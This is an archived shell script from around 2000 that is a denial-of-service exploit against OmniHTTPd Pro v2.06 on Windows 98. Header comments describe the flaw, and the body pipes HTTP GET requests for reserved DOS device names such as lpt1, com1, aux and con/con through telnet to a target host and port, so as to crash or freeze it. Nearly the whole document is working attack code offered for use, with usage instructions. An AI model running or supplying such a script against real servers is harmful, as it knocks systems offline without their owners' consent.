home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- # Vulnerable versions:
- # Omni Httpd pro v.2.06 Win98 (NT not tested)
- #
- # The problem:
- # It is possible to crash remote system because
- # OmniHttpD (version: Pro. v2.06, maybe others)
- # parse the path strings to call some FAT32/VFAT
- # routines in the kernel which makes your system
- # unstable and useless until next reboot.
- #
- # Fix:
- # Unknown for now, I mailed Omnicron Technologies
- # they will probably fix this bug in next version.
- #
- # About:
- # Discovered by: sirius from b0f
- # Coded by: sirius from buffer0vefl0w security (b0f)
- # [http://b0f.freebsd.lublin.pl]
-
- if [ "$1" = "" ]; then
- echo "OmniHTTPd v.2.06 DoS attack"
- echo
- echo "Coded: sirius from buffer0vefl0w security (b0f)"
- echo "[http://b0f.freebsd.lublin.pl]"
- echo
- echo "Usage: $0 <host> <port>"
- echo
- exit 1
- fi
-
- echo "Launching attack ... please wait "
-
- # this will crash some devices, but if modem is on comX the code after line with comX will not
- # be executed ... you can change the order of execution ;)
-
- (echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
- (echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
-
- # the following code will crash/freeze/make system busy/how to call it? system
-
- (echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
- (echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null
-
- echo "Crash code send ..."
- killall -9 telnet 2>/dev/null 1> /dev/null
- echo "Done!"
- # www.hack.co.za [10 May 2000]#
